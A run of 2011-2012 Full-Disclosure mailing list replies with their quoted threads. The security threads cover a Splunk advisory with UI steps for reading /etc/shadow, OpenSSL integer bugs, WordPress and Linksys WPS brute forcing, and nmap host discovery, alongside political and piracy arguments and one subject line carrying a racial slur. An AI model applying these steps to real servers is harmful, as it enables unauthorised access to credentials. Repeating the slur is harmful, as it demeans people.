Re: [Full-disclosure] Splunk Vulnerability
1.) The tool, Splunk, is designed to index logs 2.) Logs are arbitrary files. Therefore, 3.) Splunk is designed to index arbitrary files. Whether or not you could preview the file before indexing, there would still be ways to gain access to the contents of the file once indexed. This just happens to make such access more convenient, at worst. (At best, it proves to be a useful part of a useful tool allowing the user to verify the blob of data they wish to index is the/a proper blob to index.) At least, that's my understanding. So it isn't a design defect, since that's exactly what Splunk is intended to do. It's only a vulnerability in the sense that it allows a potentially unprivileged user -- that is, one with access to Splunk but not necessarily to the machine -- to see privileged information. However, an administrator should already know that potentially sensitive information is easily searchable and recoverable through the tool in general by design, and adjust expectations, access rules, etc. accordingly. That or restrict the privileges of the tool and/or its users (potentially restricting its usefulness as well). On Sep 5, 2012 8:40 PM, Michael D. Wood m...@itsecuritypros.org wrote: 8/3/12 - Vendor Response we don't consider this behaviour a design defect or vulnerability Why on earth would they think this would be ok? -- Michael D. Wood ITSecurityPros.org www.itsecuritypros.org -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Rodrigo Salvalagio Sent: Monday, September 03, 2012 3:40 PM To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] Splunk Vulnerability = - Release date: September 3rd, 2012 - Discovered by: Marcio Almeida of CIPHER Intelligence Labs - Severity: Medium - CVSS Base Score: 6.3 (AV:N/AC:M/Au:S/C:C/I:N/A:N/E:P/RL:U/RC:C) = I. VULNERABILITY - Splunk = 4.3.3 Reading Arbitrary Files Contents II. BACKGROUND - Splunk[1][2][3] is a software to search, monitor and analyze machine-generated data by applications, systems and IT infrastructure at scale via a web-style interface.[4] Splunk captures, indexes and correlates real-time data in a searchable repository from which it can generate graphs, reports, alerts, dashboards and visualizations.[5][6] Splunk aims to make machine data accessible across an organization and identifies data patterns[7], provides metrics, diagnoses problems and provides intelligence for business operation. Splunk is a horizontal technology used for application management, security and compliance, as well as business and web analytics.[8] Splunk has over 3,700 licensed customers in 74 countries, including almost half of the Fortune 100.[9] III. INTRODUCTION - Splunk 4.3.3 and prior versions has Data Preview functionality located at: Manager Data Inputs Files Directories Data Preview which allows an authenticated user to read the content of arbitrary files on the server it is running. IV. PROOF OF CONCEPT - 1 - Go to the screen of functionality located at Manager Data Inputs Files Directories Data Preview. 2 - Insert the path to file into Path to file on server field. 3 - Click on Continue. 4 - See the content of file. The following screenshots illustrate reading the contents of /etc/shadow: Step 1: http://imageshack.us/f/837/etcshadowserversplunk0d.png/ Step 2: http://imageshack.us/f/835/etcshadowserversplunk0d.png/ V. BUSINESS IMPACT - An authenticated attacker with admin privileges on splunk could exploit the vulnerability to retrieve the contents of any sensitive files in the server accessible by the operating system user the splunk service is running as. If splunkd is running as root user, the attacker can read the content of any file in the server, including /etc/shadow and other sensitive configuration files. Thus, being an admin in the splunk UI allows an attacker to obtain information that may lead to escalation of privileges on the operating system where splunk is installed. The vendor was notified of this behavior, and declared not to consider it either a defect or a vulnerability. VI. SYSTEMS AFFECTED - Version 4.3.3 and prior versions are vulnerable. VII. SOLUTION - N/A. VIII. DISCLOSURE TIMELINE - 7/27/12 - Vulnerability discovered. 8/3/12 - Vendor Contacted. 8/3/12 - Vendor Response we don't consider this behaviour a design defect or vulnerability. 8/3/12 - Vendor informed about full disclosure in some days. 9/3/12 - Full disclosure IX. REFERENCES - [1]
Re: [Full-disclosure] Certificacion - Profesional Pentester
http://www.reactiongifs.com/wp-content/uploads/2011/05/THISGONBGUD.gif On May 23, 2012, at 6:42 PM, Alex Buie ab...@kwdservices.com wrote: This is gonna be fun. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] incorrect integer conversions in OpenSSL can result in memory corruption.
Well, not cleanly... I would think though that a signed integer cast to a size_t would have unpredictable results (but mostly just a larger value than intended...). At least when size_t and int are both 32bit. Or am I wrong? On Apr 21, 2012, at 2:33 PM, Jeffrey Walton noloa...@gmail.com wrote: On Thu, Apr 19, 2012 at 10:32 AM, Benjamin Kreuter ben.kreu...@gmail.com wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA512 On Thu, 19 Apr 2012 12:35:22 +0200 Tavis Ormandy tav...@cmpxchg8b.com wrote: All versions of OpenSSL on all platforms up to and including version 1.0.1 are affected. [snip] BUF_MEM_grow_clean accepts a size_t, but the subroutine it uses to handle the allocation only accepts a 32bit signed integer. Correct me if I am wrong, but shouldn't this only be a problem on systems where a size_t is wider than an int i.e. not on 32 bit systems? I don't believe so (that is, it can be a problem on 32 bit systems), but I'd need to see more context. For example, if the attacker controls the size and forces the size to negative (due to use of an int), then it will never convert to a size_t. void *CRYPTO_realloc_clean(void *str, int old_len, int num, const char *file, int line) { /* ... */ ret=malloc_ex_func(num,file,line); if(ret) { memcpy(ret,str,old_len); OPENSSL_cleanse(str,old_len); free_func(str); } /* ... */ return ret; } ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Brute Force vulnerability in WordPress
He also considers it a vulnerability to tell a new user that the username they've picked out has been taken by another user. On Sun, Mar 25, 2012 at 3:09 PM, InterN0T Advisories advisor...@intern0t.net wrote: Same type of vulnerabilities exist in 99,999...% of all web applications including your website. Even if you can't bruteforce all the time, you can adjust it with timing, and e.g., proxies, different user-agents, etc., and then you have Timed Bruteforce Attacks which works on pretty much all websites. Did you also mention this 5-10 years ago on your web site about website security named websitesecurity.com.ua? Also, when will you stop posting about: bruteforce/full path disclosure/locking actual users out/and other low priority vulnerabilities that exist in most web apps, and completely move on to vulnerabilities that matters? Seriously, anyone can find these vulnerabilities and the reason why anyone hasn't reported / disclosed / complained about them is because they exist in most apps and doesn't compromise the security of the end-user nor the website. Will the next thing you disclose be about bruteforcing SSH because it by default doesn't lock users out? It's been like this for +10 or +20 years. What I find funny is that either you: A) Say a web app has a vulnerability because it doesn't lock the offending user out because of too many password tries, OR B) Say a web app has a vulnerability because it does lock out the offending user because of too many password tries. It's almost a contradiction and an endless evil circle. You can't have both, ever. No offense intended of course. Best regards, MaXe On Sun, 25 Mar 2012 23:45:33 +0300, MustLive mustl...@websecurity.com.ua wrote: Hello list! There are many vulnerabilities in WordPress which exist from version 2.0, or even from 1.x versions, and still not fixed. So I want to warn you about one of such holes. It's Brute Force vulnerability via XML-RPC functionality in WordPress. - Affected products: - Vulnerable are WordPress 3.3.1 and previous versions. -- Details: -- Brute Force (WASC-11): http://site/xmlrpc.php In this functionality there is no protection against Brute Force attack. At sending of corresponding POST-requests it's possible to pick up password. Note, that since WordPress 2.6 the XML-RPC functionality is turned off by default. WP developers did it due to vulnerabilities (such as SQL Injection and others), which were found in this functionality, i.e. not motivating it as counteraction to Brute Force, but it worked also as protection against Brute Force attack. So this issue doesn't concern those who uses WordPress since version 2.6 with default settings. But those who needs to use XML-RPC, those will have Brute Force vulnerability, because the developers didn't make reliable protection against it. Earlier in 2008 and 2010 years I've already wrote about Brute Force vulnerabilities in WordPress (http://websecurity.com.ua/2007/ and http://websecurity.com.ua/4016/ SecurityVulns ID: 10677) and it's another such vulnerability. Besides them there is also known BF attack not via login form, but with using of authorization cookie (when by setting different cookies it's possible to pick up password). Timeline: 2012.03.20 - disclosed at my site. I mentioned about this vulnerability at my site (http://websecurity.com.ua/5723/). Best wishes regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Earth to Facebook
Could he not use a trusted intermediary though? That is, find someone to report the issue who can be entangled by ToS, will take screenshots, etc. I suppose the biggest problem of this would be the trust part, though. :) On Mar 18, 2012 9:14 AM, Jeffrey Walton noloa...@gmail.com wrote: On Sun, Mar 18, 2012 at 8:57 AM, Ferenc Kovacs tyr...@gmail.com wrote: https://www.facebook.com/whitehat/report/ ? Its encumbered by Terms of Service. Its better to find an email address so that (1) you are not bound by legal entanglements, and (2) you have a written record of the correspondence. I'd try RFC 2142 (MAILBOX NAMES FORvCOMMON SERVICES, ROLES AND FUNCTIONS, http://www.ietf.org/rfc/rfc2142.txt). sec...@facebook.com and secu...@facebook.com. Jeff On Thu, Mar 15, 2012 at 4:37 PM, J. Oquendo s...@infiltrated.net wrote: Earth calling Facebook security engineers, earth calling Facebook security engineers. Tried reaching out to you guys about a vulnerability a good friend discovered. No one should have to hunt you guys down in an effort to assist you with security flaws. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Cookie based SQL Injection
Even so, watch all the advisories pour in now for cookie-based SQL injection. :/ On Mar 6, 2012 12:44 PM, valdis.kletni...@vt.edu wrote: On Tue, 06 Mar 2012 14:28:51 CST, Adam Behnke said: Unlike other parameters, cookies are not supposed to be handled by users. Any site that designs its security model around that concept will get what it richly deserves. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Linksys Routers still Vulnerable to Wps vulnerability.
Solution: use DD-WRT? Or is that vulnerable too? (Or are there worse problems? :)) On Feb 10, 2012 10:12 AM, Dan Kaminsky d...@doxpara.com wrote: Fixing a vulnerability like this with all the bureoucratic, QA and legal process wouldn't take no more than 2 weeks If bureaucratic, QA, and legal issues emerge, you can't even get the names of the people you need to speak to in less than 2 weeks, let alone schedule a conference call. Fixing? Heh. Aside from rate limiting WPS, there isn't much of a fix, and you can't turn it off either. Sent from my iPhone On Feb 10, 2012, at 2:40 AM, farthva...@hush.ai wrote: Don't buy Linksys Routers they are vulnerable to Wifi unProtected Setup Pin registrar Brute force attack. No patch or workaround exist at the making of this post. Vulnerable list and alleged patch availability: source:http://www6.nohold.net/Cisco2/ukp.aspx?vw=1articleid=25154 E1000 To Be Disclosed (aka we don't have idea) E1000 v2 To Be Disclosed E1000 v2.1 To Be Disclosed E1200 v1 early March E1200 v2 early March E1500 early March E1550 mid March E2000 To Be Disclosed E2100L mid March E2500 early March E3000 To Be Disclosed E3200 early March E4200 v1 early March E4200 v2 To Be Disclosed M10 To Be Disclosed M20 To Be Disclosed M20 v2 To Be Disclosed RE1000 early March WAG120N To Be Disclosed WAG160N To Be Disclosed WAG160N v2 To Be Disclosed WAG310G To Be Disclosed WAG320N To Be Disclosed WAG54G2 To Be Disclosed WAP610N To Be Disclosed WRT110 To Be Disclosed WRT120N To Be Disclosed WRT160N v1 To Be Disclosed WRT160N v2 To Be Disclosed WRT160N v3 To Be Disclosed WRT160NL To Be Disclosed WRT310N v1 To Be Disclosed WRT310N v2 To Be Disclosed WRT320N To Be Disclosed WRT400N To Be Disclosed WRT54G2 v1 To Be Disclosed WRT54G2 v1.3 To Be Disclosed WRT54G2 v1.5 To Be Disclosed WRT54GS2 v1 To Be Disclosed WRT610N v1 To Be Disclosed WRT610N v2 To Be Disclosed X2000 To Be Disclosed X2000 v2 To Be Disclosed X3000 To Be Disclosed The question is why a big company like Cisco/Linksys didn't release a patch since almost 1 month and a half ?. Well i have circumstantial evidence that Cisco outsource some of their Linksys firmware routers to other companies (Arcadyan for example.) in some cases source code is only available through NDA's or not available at all. That's why they are taking so long to release a fix to the WPS vulnerability. Fixing a vulnerability like this with all the bureoucratic, QA and legal process wouldn't take no more than 2 weeks. I found some GPL violations by the way but this is beyond the scope of this message (obfuscating firmware it's useless you now). I apologize if i offended someone but IT security it's serious business specially if someone use your wifi to commit crimes. This vulnerability contains public and very easy to use exploit code, it's not a Denial of Service. Farth Vader. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] can you answer this?
The original message reads thus: i was working with cleaning up any to any on fw. ran across inside ips doing netbios (NS) , and one using port 4330 to 7.8.0.106, or .107. a who is give .miil DoD Network Information Center. ? we are just a manufacturing company. One ip is from a NAS device for staorage. The other is DNS server I expect it's supposed to read like this: I was working on cleaning up my 'any to any' rulesets on my firewall and I ran across internal IPs using the NetBIOS protocol, which is unexpected behavior. One of my internal hosts also appears to be attempting to connect to 7.8.0.106 or 7.8.0.107 on port 4330. A WHOIS lookup tells me that those IPs belong to the IP range owned by the U.S. Department of Defense. What is going on? We're just a manufacturing company. One of the IPs participating in this traffic is supposed to be network storage, while the other is supposed to just do DNS. And because no one answered him, he decided to try another line of inquiry: My firewall logs have also picked up traffic from our internal trusted network to an external untrusted network with entries such as: 2012-02-02 10:08:10 7.254.254.254:68 7.254.254.255:67 0.0.0.0:0 0.0.0.0:0 DHCP 0 sec. 0 0 Traffic Denied It was denied. What is happening here? I have no idea what's happening there; I'd suggest looking at the machines for strange activity, maybe doing some tcpdumps and seeing if you can trace back any of the packets you find to any of your machines. But I can't think of any reason your internal machines should be trying to connect to those hosts. (Especially considering those hosts may not exist!) On Fri, Feb 3, 2012 at 12:31 AM, ja...@zero-internet.org.uk wrote: So what's the question? --Original Message-- From: RandallM Sender: full-disclosure-boun...@lists.grok.org.uk To: funsec To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] can you answer this? Sent: 3 Feb 2012 08:20 since no one could answer the last one how bout this. In my FW log Trust (our 10.0.0.0. network) to untrust picked this up: 2012-02-02 10:08:10 7.254.254.254:68 7.254.254.255:67 0.0.0.0:0 0.0.0.0:0 DHCP 0 sec. 0 0 Traffic Denied My any to any denied queue. -- been great, thanks RandyM a.k.a System ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Sent from my BlackBerry® wireless device ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] when did piracy/theft become expression of freedom
Just to be clear, what's been done in the name of intellectual property protection is fucking ridiculous. I just do not see how getting something someone put a non-zero value of work and materials into without even so much as asking or being given permission from the person who made it is somehow not even at the very least disrespectful. Even if it is just a reproduction, it took effort to create, and you must figure it's worth something or you wouldn't have expended the effort to reproduce it to begin with. (Fair use being the main exception there, but fair use usually implies something distinctive being done to the work, too, as opposed to minor editing/shitty encoding. Feel free to correct!) To be honest and realistic, nothing can ever be done to stop copying. Ever. Nor should it. I'm just saying I consider there's no harm in it to be a myth in most cases. At the core of it, I think copyright's a totally valid thing to have, if only to stop plagiarism. Its implementation, however... (I don't see my stance changing in the near future, either. I'm sorry, I'm kind of rigid in that line of thought and I haven't heard or read anything yet to adequately address everything.) Anyway; back to lurking for me. :) On Jan 30, 2012 12:17 AM, Christian Sciberras uuf6...@gmail.com wrote: Uhm, that was a ridiculous situation anyway (@illegal primes). So lets leave it at 'not necessarily'. On Mon, Jan 30, 2012 at 9:08 AM, Mike Hale eyeronic.des...@gmail.comwrote: Not necessarily. Look at the effects of people posting DeCSS and the HDDVD keys a while back. The industry ended up giving in precisely because people said, en masse, fuck off. On Mon, Jan 30, 2012 at 12:05 AM, Christian Sciberras uuf6...@gmail.com wrote: No, it follows the fact that vengeance (the fuck you Byron mentioned) isn't fruitful to remedy the situation. On Mon, Jan 30, 2012 at 8:54 AM, Mike Hale eyeronic.des...@gmail.com wrote: What you said doesn't follow. Making a digital copy isn't burning down a business. The analogy linking 'piracy' with theft is ludicrous. On Sun, Jan 29, 2012 at 11:50 PM, Christian Sciberras uuf6...@gmail.com wrote: Byron, you don't protest to the government by burning down 100-year-old business, if you know what I mean... On Mon, Jan 30, 2012 at 12:12 AM, Byron L. Sonne byron.so...@gmail.com wrote: The thing that makes me laugh about all of this, and one of the key things I learned from reading Gibbon's Decline Fall is this: The number and frequency of laws passed regarding things directly relates to how widespread these things are, and how they much the laws are ignored and ineffective. Laws can't prevent a damn thing, they can only specify remedies. As it is said, it's only illegal if you get caught. The cat is out of the bag and will never be put back in. There's no way to stop people from 'illegally' copying copyrighted material. If they somehow managed to require and implement tech so that perfect digital copies can't be made (unlikely) then people will simply use a camera to record the video as it plays on the screen. Hey, wait a minute, that sounds just like that screener I downloaded someone taped in Russia! ;) If they manage to require and implement tech so that you can't trade it over the internet (unlikely) then people will simply trade it on private networks or, like we used to do in the old days, via sneakernet. The problem is that in an attempt to control the dissemination of copyrighted material (and people are right, artists do have a right to reap the benefits of their effort) the powers-that-be are stepping over the line and into territory that impacts our ability to communicate in the fashion we choose. It might be fine to try and prevent piracy but in the process of doing so you are trashing the other desires of people that have nothing to do with piracy. I'm sure if the copyright lobby had their way, they'd require us to wear special glasses in order to see our laptop screens, on the assumption that anything not explicitly licensed was assumed to be unlicensed, and thus pirated, which we would be blocked from our field of view... and as a result, some girl/guy who wants to write a simple freeware text editor now has to jump through regulatory hoops and spend money to obtain a special registration that allows their text editor to display to the screen. This is a cheesy example, but I think it makes the point. In the guise of 'protecting artists and businesses' what is happening is that the powers-that-be are requesting (and too often getting) powers that allow them to trample on the general idea of freedom of communications and other things people cherish. As a result, people are inclined to engage in the very behaviours that elicited
Re: [Full-disclosure] when did piracy/theft become expression of freedom
On Jan 27, 2012 4:07 PM, valdis.kletni...@vt.edu wrote: On Fri, 27 Jan 2012 18:06:28 GMT, Michael Schmidt said: You want to be very careful with that line of thought. You are taking the creator the rightful owners profits, which they are entitled to if it is a product they created to be sold. You might want to go read Courtney Love Does The Math, and then ask yourself the following: 1) You can make a case that if you copy an album intead of buying it, you're depriving somebody of profits. But what if it's an album that you would *not* have bought at full price anyhow? Or one that you bought used (see first sale principle)? If you buy an album used, the seller generally loses possession of it, you gain possession of it at a reduced cost, and the original purchase still gave the original seller and producer value. Value has still been exchanged, assuming no literal theft was involved to make the whole thing criminal anyway. If you make a copy, you're pretty much creating (or, if you prefer, *re*-creating) value out of basically nothing using source material, but nothing of value goes back to the original creator of what was copied. Besides that, I do not trust customers to make their own price up for everything they buy because (a) they may be honest but not know how to properly appraise a piece of work or (b) they will try to shaft you. It's literally like blindly trusting user input. Before you bring up Humble, Radiohead, et al: just because it can and has been done a few times doesn't mean it's viable or as lucrative as it should be. (Humble even STILL had pirates, IIRC!) 2) Who gets those profits, the artist, the label, or the RIAA? Are you stealing profits from the artist, or are you stealing them from somebody else who was attemting to steal them from the artist? All of the above; while the companies' creative accounting is almost criminally bullshit, the artist *still* gets a cut and even a profit if they do well enough. As a nasty little bonus, any profit taken from those companies will never, ever be seen by the artist regardless. There is a 100% better chance of an artist receiving money via a record company getting paid for the artist's work than a record company *not* getting paid from the artist's work. It's gotta come from somewhere. So if you're screwing them and they're screwing the artist, you just wind up making them screw the artist that much harder. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Nmap
Yet another note, this one ARP-related: while true that most devices on your local network will respond to ARP, it's important to note (as the wording of almost certain implies) that it is possible to purposely suppress ARP responses to all but a few hosts. I know for certain that the Linux kernel has a module (and associated toolset) specifically for that sort of thing called arptables, with usage very similar to iptables if you're already familiar with that. There's also a tool (again on *nix) called arping, which is ping but with ARP requests. Device firewalls (or at least Windows's built in firewall) tend(s) not to block ARP requests or replies, so arping might be able to show you those firewalled hosts, too. (That doesn't mean those hosts aren't properly configured to correctly block incoming traffic, however!) On Mon, Jan 2, 2012 at 2:10 PM, Gage Bystrom themadichi...@gmail.comwrote: (I don't have the original, so ill qoute this guy) Nmap has an option to change how it determines if a host is up by attempting a port connection instead. I find this to be highly effective. Using a couple of standard ports are the best, such as 80, 21, etc. If you only have a few ports your searching for, then drop host discovery and scan those specific ports, youd get the same results but a tad bit less overhead(mainly in the sense of stealth or an obsession with not wasting bandwidth if you can help it) On Jan 2, 2012 1:00 PM, S Walker walke...@hotmail.co.uk wrote: Just an added note to the current replies (which are all great for hosts not in the local broadcast domain): It is almost certain that every device in your local network will respond to an ARP request. nmap does this by default anyway (-PR for local networks), but it's worth bearing in mind, as something local that won't respond to an ARP request is almost certainly not reachable. S Date: Mon, 2 Jan 2012 12:03:42 -0500 Subject: Re: Nmap From: juan.qu...@gmail.com To: pen-t...@securityfocus.com Sorry for the late answer... But when you scan for machines that do not answer to ping (it means answer with an echo reply for each echo request), you could try using timestamp, and will return timestamp reply, and also information request and wait for an information reply Both coould be useful also to detect equipments that do not answer to ping. And if you want something more noisy maybe a network discovery or a -P0 option. Here is a summary of message types with their port (for ICMP protocol). 0 Echo Reply 3 Destination Unreachable 4 Source Quench 5 Redirect 8 Echo 11 Time Exceeded 12 Parameter Problem 13 Timestamp 14 Timestamp Reply 15 Information Request 16 Information Reply More detail on: http://www.faqs.org/rfcs/rfc792.html Hope it will be useful. Regards, Juan Pablo. On Sun, Oct 2, 2011 at 4:35 PM, John M. Martinelli wrote: This would work but it would be kind of noisy to open port scan every host. Also probably a little more time consuming. Adding in syn scan or open port scan will create more time required as we're now looking for open ports. What if all ports are closed? Will it respond to a certain type of ICMP? I think a great question to ask is: What is the least-impactful way I can very quickly determine what hosts are alive? without a traditional ping sweep. On Sat, Oct 1, 2011 at 10:37 PM, Jeffory Atkinson wrote: All depends on what you are trying to achieve. I would assume that you are not concerned about monitoring devices seeing you have done a ping sweep with nmap. I agree with others a port scan is going to give you the best idea if a host is active. There are Many instances filtering devices can drop icmp or respond for hosts behind them. Open ports and services are the best identifiers. A port has to be open in some form (open or filtered) to interact with in-bound connections. I would recommend a -sS (syn) scan you can opt for standard services or add -p1- for all 65k+ ports. All ports will verify and services/demons running. There are other options if bandwidth is an issue. On Sep 30, 2011, at 5:17 PM, Ukpong wrote: Can somebody suggest the best NMAP commands for identifying hosts that are not responding to ICMP ping requests ? This list is sponsored by: Information Assurance Certification Review Board Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT and CEPT certs require a full practical examination in order to become certified. http://www.iacertification.org This list is sponsored by:
Re: [Full-disclosure] [OT] the nigger said: American people understand that not everybody's been following the rules
Indeed? Are they supposed to be taking pictures of events with handmade cameras? Wearing clothes they made from the ground up? Not shaving or shaving with crudely-fashioned makeshift blades from spare metal? The usage of corporate products does not disqualify one from criticizing those corporations, their behaviors, their products or the government. At least partially because it's practically unavoidable for most people. Are you honestly saying they should have just spread local word of mouth in their area and hoped it would sweep the country because that wouldn't have used any corporate resources? That is a most inefficient way of moving people, especially with a news media that is proving actively hostile to those who are admittedly threatening its cushy seat. On Oct 12, 2011 9:41 AM, Thor (Hammer of God) t...@hammerofgod.com wrote: I saw this on FB and thought I would pass it along: http://99percentexif.tumblr.com/ ** ** It’s the exif data from the photos the 99%’ers are posting – showing the $1000 systems, cameras, and software they are using to post. ** ** t ** ** *From:* full-disclosure-boun...@lists.grok.org.uk [mailto: full-disclosure-boun...@lists.grok.org.uk] *On Behalf Of *Christian Sciberras *Sent:* Wednesday, October 12, 2011 12:45 AM *To:* noloa...@gmail.com *Cc:* full-disclosure@lists.grok.org.uk *Subject:* Re: [Full-disclosure] [OT] the nigger said: American people understand that not everybody's been following the rules ** ** Regarding who's doing the most damage to US economy, I'll just say I won't comment. ** ** I take issue with the 1%/99% idea; ie, the excuse that some people deserve more just because they are allowed to lie - even if it makes them hypocrites. ** ** ** ** On Wed, Oct 12, 2011 at 9:40 AM, Jeffrey Walton noloa...@gmail.com wrote: On Wed, Oct 12, 2011 at 2:51 AM, Christian Sciberras uuf6...@gmail.com wrote: Darren's and indeed many other people's lame excuse is that they're too humble to be greedy. As if! Its not about greed - pursuit of wealth is fine. You just can't harm others while doing it. (Well, apparently you can in the US). One of the funniest things I ever read regarding Bin Laden's little war was a boycott of the US dollar to reduce reliance [on the dollar] and to harm the US economy [1]. Thought experiment: terrorist wanted to ruin the US economy. US Financial institutions threw the US (and world) economy into a recession (again). The US financial institutions responsible must be terrorist organizations. Thank {insert higher being here} that Bin Laden did not make a PAC contribution on 9/10. Jeff [1] http://www.nytimes.com/2010/01/30/world/middleeast/30binladen.html On Tue, Oct 11, 2011 at 6:07 PM, Jeffrey Walton noloa...@gmail.com wrote: On Tue, Oct 11, 2011 at 9:25 AM, Darren Martyn d.martyn.fulldisclos...@gmail.com wrote: Chris - Empathy, guilt, and morals. Guilt being a major factor. The possibility was always there to make millions via evil means, but morals and knowing it would be hard to live with. The problem is not getting lots of money. That is the easy part. The issue is with living with yourself afterward. How about illegal? Check out the Hobbs Act [1]. I'm not making this crap up - the US has laws on the books for negatively affecting commerce (which the crash did), and using fear to peddle their warez (how financial institutions market their instruments). There's probably provisions in the PATRIOT Act, too. The last tine I checked (about a year ago), the SEC had opened fewer than 100 civil investigations. No criminal investigations, despite the fact that some of the financial institutions created spurious ratings companies just to rate their instruments 'good'. Jeff [1] http://www.justice.gov/usao/eousa/foia_reading_room/usam/title9/131mcrm.htm [SNIP] ** ** ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [OT] Obama said: American people understand that not everybody's been following the rules
I wasn't aware they were advocating the dissolution of all corporations; I had heard through various outlets that they simply didn't want money influencing laws to favor the corporation over the individual. As well as the bailing out of the banks while leaving the people homeless. And I don't think I'll let the threat of being a hypocrite stop me from saying Apple sucks balls just because I own and no longer use an iPhone. On Oct 12, 2011 2:17 PM, Paul Schmehl pschmehl_li...@tx.rr.com wrote: --On October 12, 2011 11:00:32 AM -0700 Zach C. fxc...@gmail.com wrote: Indeed? Are they supposed to be taking pictures of events with handmade cameras? Wearing clothes they made from the ground up? Not shaving or shaving with crudely-fashioned makeshift blades from spare metal? The usage of corporate products does not disqualify one from criticizing those corporations, their behaviors, their products or the government. No, but it certainly does make one a hypocrite. At least partially because it's practically unavoidable for most people. Are you honestly saying they should have just spread local word of mouth in their area and hoped it would sweep the country because that wouldn't have used any corporate resources? That is a most inefficient way of moving people, especially with a news media that is proving actively hostile to those who are admittedly threatening its cushy seat. Isn't that interesting? They want to get rid of all the corps, yet they don't want to do without their products because it would be a most inefficient way of moving people If you can't see the irony and hypocrisy of that position, you might be a liberal. Oh, 'scuse me, progressive. -- Paul Schmehl, Senior Infosec Analyst As if it wasn't already obvious, my opinions are my own and not those of my employer. * It is as useless to argue with those who have renounced the use of reason as to administer medication to the dead. Thomas Jefferson There are some ideas so wrong that only a very intelligent person could believe in them. George Orwell ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] New open source Security Framework
Telling people to move their criticisms off of the (unmoderated) public forum and into the private forum that you control (and can freely censor as you see fit) is ridiculous. Now, if you really did as root said and just grabbed peoples' code from various public outlets and put it into your GPL product... *you really can't do that*. First off, the copyright of the code does not belong to you. You have to get permission or a separate license, *in writing*, *from the original author of the code*. If they don't give it to you, you have to do without or have someone cleanroom it for you (if you rewrite it yourself, your clone is arguably contaminated by your previous exposure). And they have to specifically authorize you to redistribute with the GPL license. If *they've* distributed with GPL, you should be fine; if they've distributed with nearly *any other license at all*, you have to get permission to redistribute since most other licenses impose additional restrictions which are specifically forbidden by the GPL. And if you're AT ALL unclear on what the redistribution license for their code is, the safe choice is simply to not redistribute. Just because someone puts their code out in public doesn't mean you're allowed to put their code out in public as well. As to your claim that Exploit Pack is working without any foundation, company, governement and money-giving guy, -- number one, you probably mean 'Venture Capitalist when you say money-giving guy. Number two, you seem to be either the PR for or the head of the company that makes INSECT Pro, correct? If INSECT Pro is your product and Exploit Pack is your *open source * product, especially given the proximity of both tools in their field (information security or whatever you want to call it), I would call this claim quite a stretch, at best. You are providing some measure of similar support for both products; how are you working to eliminate the conflict of interest of pulling something from Exploit Pack into INSECT? Maybe I'm not well-versed enough in your products, but I still do not believe it is possible for you (personally!) to claim Exploit Pack as a personal pet project when it's that close to the one you sell for money. On Wed, Oct 5, 2011 at 9:06 PM, Juan Sacco juansa...@gmail.com wrote: ro...@fibertel.com : I know you don't have any experience with open source projects, but this is not the right way. Next time you should try doing it well. Go to GitHub and write the change your own. The community will moderate it and then you will see your proposal applied. To be clear. The license on the script you mention is the license for all the software not only for the script. Oki 